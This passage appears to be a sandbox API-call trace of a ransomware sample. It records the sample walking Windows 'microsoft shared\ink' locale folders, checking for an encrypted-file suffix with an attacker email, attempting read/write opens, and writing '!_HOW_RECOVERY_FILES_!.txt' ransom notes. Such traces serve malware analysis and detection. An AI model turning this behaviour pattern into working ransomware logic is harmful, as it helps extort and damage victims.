_Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui") returned 73 [0088.394] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.394] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.394] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui") returned 0x49 [0088.395] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.395] GetLastError () returned 0x5 [0088.395] FindNextFileW (in: hFindFile=0x84b11ddc20, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.395] FindClose (in: hFindFile=0x84b11ddc20 | out: hFindFile=0x84b11ddc20) returned 1 [0088.395] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG") returned 0x39 [0088.395] strlen (_Str="${KEY}") returned 0x6 [0088.395] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.395] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.395] strlen (_Str="${CODE}") returned 0x7 [0088.395] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.395] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.395] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.395] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.395] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.395] __uncaught_exception () returned 0x84b1160800 [0088.395] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.396] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.396] wcsstr (_Str="Content.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.396] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 63 [0088.396] wcscmp (_String1="Content.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.396] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Content.xml") returned 0x0 [0088.396] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 0x3f [0088.396] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.396] GetLastError () returned 0x5 [0088.396] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.396] wcsstr (_Str="cs-CZ", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.396] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ") returned 57 [0088.396] wcscmp (_String1=".", _String2="cs-CZ") returned -1 [0088.396] wcscmp (_String1="..", _String2="cs-CZ") returned -1 [0088.396] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ") returned 0x39 [0088.396] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ") returned 0x0 [0088.397] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*" [0088.397] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd9e0 [0088.397] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.397] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\.") returned 59 [0088.397] wcscmp (_String1=".", _String2=".") returned 0 [0088.397] FindNextFileW (in: hFindFile=0x84b11dd9e0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.397] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.397] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\..") returned 60 [0088.397] wcscmp (_String1=".", _String2="..") returned -1 [0088.397] wcscmp (_String1="..", _String2="..") returned 0 [0088.397] FindNextFileW (in: hFindFile=0x84b11dd9e0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.397] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.397] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 73 [0088.397] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.397] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.397] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 0x49 [0088.397] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.397] GetLastError () returned 0x5 [0088.397] FindNextFileW (in: hFindFile=0x84b11dd9e0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.397] FindClose (in: hFindFile=0x84b11dd9e0 | out: hFindFile=0x84b11dd9e0) returned 1 [0088.397] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ") returned 0x39 [0088.397] strlen (_Str="${KEY}") returned 0x6 [0088.397] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.397] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.397] strlen (_Str="${CODE}") returned 0x7 [0088.397] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.397] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.397] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.398] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.398] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.398] __uncaught_exception () returned 0x84b1160800 [0088.398] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.399] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.399] wcsstr (_Str="da-DK", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.399] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK") returned 57 [0088.399] wcscmp (_String1=".", _String2="da-DK") returned -1 [0088.399] wcscmp (_String1="..", _String2="da-DK") returned -1 [0088.399] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK") returned 0x39 [0088.399] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK") returned 0x0 [0088.399] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*" [0088.399] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11ddb60 [0088.400] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.400] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\.") returned 59 [0088.400] wcscmp (_String1=".", _String2=".") returned 0 [0088.400] FindNextFileW (in: hFindFile=0x84b11ddb60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.400] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.400] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\..") returned 60 [0088.400] wcscmp (_String1=".", _String2="..") returned -1 [0088.400] wcscmp (_String1="..", _String2="..") returned 0 [0088.400] FindNextFileW (in: hFindFile=0x84b11ddb60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.400] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.400] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui") returned 73 [0088.400] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.400] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.400] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui") returned 0x49 [0088.400] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.417] GetLastError () returned 0x5 [0088.417] FindNextFileW (in: hFindFile=0x84b11ddb60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.417] FindClose (in: hFindFile=0x84b11ddb60 | out: hFindFile=0x84b11ddb60) returned 1 [0088.417] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK") returned 0x39 [0088.417] strlen (_Str="${KEY}") returned 0x6 [0088.417] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.417] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.417] strlen (_Str="${CODE}") returned 0x7 [0088.417] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.417] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.417] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.417] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.418] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.418] __uncaught_exception () returned 0x84b1160800 [0088.418] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.419] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.419] wcsstr (_Str="de-DE", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.419] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE") returned 57 [0088.419] wcscmp (_String1=".", _String2="de-DE") returned -1 [0088.419] wcscmp (_String1="..", _String2="de-DE") returned -1 [0088.419] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE") returned 0x39 [0088.419] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE") returned 0x0 [0088.419] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*" [0088.419] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd320 [0088.420] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.420] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\.") returned 59 [0088.420] wcscmp (_String1=".", _String2=".") returned 0 [0088.420] FindNextFileW (in: hFindFile=0x84b11dd320, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.420] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.420] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\..") returned 60 [0088.420] wcscmp (_String1=".", _String2="..") returned -1 [0088.420] wcscmp (_String1="..", _String2="..") returned 0 [0088.420] FindNextFileW (in: hFindFile=0x84b11dd320, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.420] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.420] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui") returned 73 [0088.420] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.420] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.420] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui") returned 0x49 [0088.420] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.420] GetLastError () returned 0x5 [0088.420] FindNextFileW (in: hFindFile=0x84b11dd320, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.420] FindClose (in: hFindFile=0x84b11dd320 | out: hFindFile=0x84b11dd320) returned 1 [0088.420] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE") returned 0x39 [0088.420] strlen (_Str="${KEY}") returned 0x6 [0088.420] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.420] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.420] strlen (_Str="${CODE}") returned 0x7 [0088.421] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.421] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.421] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.421] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.421] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.421] __uncaught_exception () returned 0x84b1160800 [0088.421] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.422] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.422] wcsstr (_Str="el-GR", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.422] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR") returned 57 [0088.422] wcscmp (_String1=".", _String2="el-GR") returned -1 [0088.422] wcscmp (_String1="..", _String2="el-GR") returned -1 [0088.422] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR") returned 0x39 [0088.422] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR") returned 0x0 [0088.422] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*" [0088.422] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd440 [0088.422] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.422] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\.") returned 59 [0088.422] wcscmp (_String1=".", _String2=".") returned 0 [0088.422] FindNextFileW (in: hFindFile=0x84b11dd440, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.422] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.422] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\..") returned 60 [0088.422] wcscmp (_String1=".", _String2="..") returned -1 [0088.422] wcscmp (_String1="..", _String2="..") returned 0 [0088.422] FindNextFileW (in: hFindFile=0x84b11dd440, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.422] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.422] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui") returned 73 [0088.422] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.422] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.422] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui") returned 0x49 [0088.422] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.423] GetLastError () returned 0x5 [0088.423] FindNextFileW (in: hFindFile=0x84b11dd440, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.423] FindClose (in: hFindFile=0x84b11dd440 | out: hFindFile=0x84b11dd440) returned 1 [0088.423] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR") returned 0x39 [0088.423] strlen (_Str="${KEY}") returned 0x6 [0088.423] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.423] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.423] strlen (_Str="${CODE}") returned 0x7 [0088.423] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.423] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.423] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.423] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.423] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.423] __uncaught_exception () returned 0x84b1160800 [0088.423] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.424] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.424] wcsstr (_Str="en-GB", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.424] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB") returned 57 [0088.424] wcscmp (_String1=".", _String2="en-GB") returned -1 [0088.424] wcscmp (_String1="..", _String2="en-GB") returned -1 [0088.424] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB") returned 0x39 [0088.424] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB") returned 0x0 [0088.424] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*" [0088.424] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd560 [0088.424] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.424] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\.") returned 59 [0088.424] wcscmp (_String1=".", _String2=".") returned 0 [0088.424] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.424] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.424] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\..") returned 60 [0088.424] wcscmp (_String1=".", _String2="..") returned -1 [0088.424] wcscmp (_String1="..", _String2="..") returned 0 [0088.424] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.424] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.424] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui") returned 73 [0088.424] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.425] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.425] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui") returned 0x49 [0088.425] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.425] GetLastError () returned 0x5 [0088.425] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.425] FindClose (in: hFindFile=0x84b11dd560 | out: hFindFile=0x84b11dd560) returned 1 [0088.425] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB") returned 0x39 [0088.425] strlen (_Str="${KEY}") returned 0x6 [0088.425] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.425] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.425] strlen (_Str="${CODE}") returned 0x7 [0088.425] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.425] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.425] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.425] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.426] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.426] __uncaught_exception () returned 0x84b1160800 [0088.426] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) 